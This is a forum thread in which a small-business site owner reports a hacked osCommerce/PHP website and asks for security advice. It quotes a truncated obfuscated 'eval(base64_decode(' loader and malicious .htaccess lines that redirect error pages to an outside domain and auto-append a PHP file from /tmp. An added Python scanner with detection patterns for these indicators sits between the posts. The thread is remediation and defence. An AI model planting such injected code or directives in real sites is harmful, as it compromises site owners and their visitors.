BleepingComputer.com: website security guidance

website security guidance

#1 User is offline   greatchap 

  Posted 23 May 2011 - 02:59 AM

Hello Guys,

How are you?

I have a website which is hosted by Hostgator. My website consists of PHP pages, an osCommerce system and MySQL databases. My site receives low-moderate traffic I guess.

Now a month ago there was some php injection or some attack. All the php files in my website were infected by some code which appeared on top of the php scripts. It was <?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKC...

I had to edit all php files and remove that code from there.

Now recently my site stopped opening. I got the error Internal Server Error. After some research I figured that the .htaccess file has been tampered with. The following lines were appearing in each .htaccess file.

ErrorDocument 400 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 403 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 404 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 405 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 406 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 408 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 500 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 501 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 502 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 503 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 504 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 505 http://arthurlundt.cz.cc/ht_er_docs/
AddHandler application/x-httpd-php .html .htm
php_value auto_append_file "/tmp/13061108586234.php"


So I had to remove the files from their respective folders. I don't know why this is happening. What I know is that the osCommerce installation on the site is outdated. That could be one reason.

But otherwise what can I do to protect myself? I will tell the guys who developed my site to at least update the osCommerce installation.

I would be glad if anyone can help me.

Thanks a lot,

Cheers,
GR
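
The indicators quoted in post #1 (an `eval(base64_decode(` header at the top of PHP files, off-site `ErrorDocument` targets, `AddHandler` mapping .html/.htm to PHP, and `auto_append_file` loading from /tmp) can be searched for across a web root after cleanup. This is an added example, not part of any post in this thread; the function names and the sample tree (the `example.invalid` host, payload and file paths) are constructed, and the last rule also covers `auto_prepend_file`, which the post does not mention.

```python
import os
import re
import tempfile

# Indicators quoted in the post: injected eval(base64_decode( header, and .htaccess tampering.
PHP_INJECT = re.compile(rb"^\s*<\?php\s*(/\*.*?\*/\s*)*eval\s*\(\s*base64_decode\s*\(", re.S)
HT_RULES = {
    "ErrorDocument points off-site": re.compile(r"^\s*ErrorDocument\s+\d{3}\s+https?://", re.I),
    "AddHandler runs .html/.htm as PHP": re.compile(r"^\s*AddHandler\s+\S*php\S*\s.*\.html?\b", re.I),
    "auto_append/prepend_file from /tmp": re.compile(
        r"^\s*php_value\s+auto_(?:append|prepend)_file\s+[\"']?/tmp/", re.I),
}

def scan_tree(root):
    """Return sorted (relative_path, finding) pairs for suspicious files under root."""
    findings = set()
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if name == ".htaccess":
                with open(path, encoding="utf-8", errors="replace") as fh:
                    for line in fh:
                        findings.update((rel, label) for label, rx in HT_RULES.items() if rx.search(line))
            elif name.lower().endswith(".php"):
                with open(path, "rb") as fh:
                    if PHP_INJECT.search(fh.read(4096)):  # injection sits at the top of the file
                        findings.add((rel, "eval(base64_decode( at top of file"))
    return sorted(findings)

def demo():
    """Build a constructed sample tree (placeholder host and payload) and scan it."""
    with tempfile.TemporaryDirectory() as root:
        os.mkdir(os.path.join(root, "catalog"))
        samples = {
            "index.php": "<?php /**/eval(base64_decode('Q09OU1RSVUNURUQ='));?>\n<?php echo 'shop';\n",
            "catalog/clean.php": "<?php echo base64_decode('b2s='); // legitimate use, not flagged\n",
            ".htaccess": "ErrorDocument 404 /404.html\n"
                         "ErrorDocument 500 http://example.invalid/ht_er_docs/\n"
                         "AddHandler application/x-httpd-php .html .htm\n"
                         'php_value auto_append_file "/tmp/constructed.php"\n',
        }
        for rel, body in samples.items():
            with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_tree(root)

if __name__ == "__main__":
    for rel, finding in demo():
        print(f"{rel}: {finding}")
```

A hit in `.htaccess` also means the file named by `auto_append_file` should be located and removed, since every PHP response includes it until the directive is gone.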

#2 User is offline   Andrew 

Posted 23 May 2011 - 04:53 AM

From what I've read, OsCommerce is a terribly vulnerable platform to be using. The most common suggestions I've been seeing are to rename and password protect the /admin directory.

Though, given what I've just read, I would also suggest that perhaps ditching OsCommerce altogether might be called for.

#3 User is offline   WeWatch 

Posted 23 May 2011 - 06:45 AM

There are many steps you can take to secure an osCommerce site.

You can replace the $PHP_SELF lines in the application_top.php files (2 of them).

You can, as someone has already suggested, rename the admin folder (security by obscurity).

You can disable the file_manager.php and define_language.php files (they are two of the most attacked files on osCommerce).

You can use a variety of methods to prevent the double .php attack.

You can use a strong .htaccess file (if you're not on Windows).

These steps go a long way in preventing osCommerce breaches.

#4 User is offline   greatchap 

Posted 24 May 2011 - 06:08 AM

Thanks a lot for your input guys.

I was talking to the guy who developed my website. He said that a lot of custom coding has been done by us and we have used the bare minimum of the osCommerce framework.

He says the problems are a result of your website hoster's weak security. In other words, according to him, websites hosted by Hostgator are prone to malware attacks or security breaches because their security is weak.

What should I do? Should I leave Hostgator?
